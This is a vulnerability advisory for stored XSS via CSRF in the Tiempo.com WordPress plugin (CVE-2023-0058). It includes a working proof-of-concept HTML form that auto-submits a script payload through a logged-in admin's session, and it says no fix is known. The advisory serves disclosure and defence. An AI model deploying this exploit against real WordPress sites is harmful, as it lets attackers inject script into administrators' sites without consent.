WordPress Plugin Vulnerabilities

Tiempo.com <= 0.1.2 - Stored XSS via CSRF

Description

The plugin does not have CSRF check when creating and editing its shortcode, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack

Proof of Concept

Make a logged in admin open a page with the code below

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=tiempocom%2Fapp%2Fadmin.php&action=new" method="POST">
      <input type="hidden" name="page" value="tiempocom/app/admin.php" />
      <input type="hidden" name="title" value="<script>alert(/XSS/)</script>" />
      <input type="hidden" name="language" value="en" />
      <input type="hidden" name="continent" value="8" />
      <input type="hidden" name="country" value="208" />
      <input type="hidden" name="location" value="12325" />
      <input type="hidden" name="location_label" value="Base Amundsen-Scott del Polo Sur" />
      <input type="hidden" name="location_link" value="https://www.tiempo.com/base-amundsen-scott-del-polo-sur.htm" />
      <input type="hidden" name="province_type" value="4" />
      <input type="hidden" name="time" value="5" />
      <input type="hidden" name="format" value="1" />
      <input type="hidden" name="temperature_format" value="0" />
      <input type="hidden" name="wind_format" value="0" />
      <input type="hidden" name="rain_format" value="0" />
      <input type="hidden" name="style" value="1" />
      <input type="hidden" name="marquee" value="#000000" />
      <input type="hidden" name="background" value="#FFFFFF" />
      <input type="hidden" name="text" value="#808080" />
      <input type="hidden" name="max" value="#FF0000" />
      <input type="hidden" name="min" value="#0000FF" />
      <input type="hidden" name="font" value="1" />
      <input type="hidden" name="save" value="Save" />
      <input type="hidden" name="action" value="-1" />
      <input type="hidden" name="paged" value="1" />
      <input type="hidden" name="action2" value="-1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Plugin icon
tiempocom
No known fix

References

CVE
CVE-2023-0058

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
7.1 (high)

Miscellaneous

Original Researcher
Shreya Pohekar
Submitter
Shreya Pohekar
Submitter website
https://shreyapohekar.com
Submitter twitter
shreyapohekar
Verified
Yes
WPVDB ID
0e677df9-2c49-42f0-a8e2-dbcf85bfc1a2

Timeline

Publicly Published
2023-04-25 (about 7 months ago)
Added
2023-04-25 (about 7 months ago)
Last Updated
2023-04-25 (about 7 months ago)

Other

Published
Title
Published
2021-03-26
Title
Patreon WordPress < 1.7.2 - Reflected XSS on patreon_save_attachment_patreon_level AJAX action
Published
2014-08-01
Title
Classipress <= 3.1.4 - Stored XSS
Published
2023-03-27
Title
Greenshift < 5.0.0 - Author+ Stored XSS
Published
2021-09-08
Title
WP Academic People List <= 0.4.1 - Reflected Cross-Site Scripting
Published
2018-02-22
Title
Custom Permalinks <= 1.1 - Cross-Site Scripting (XSS)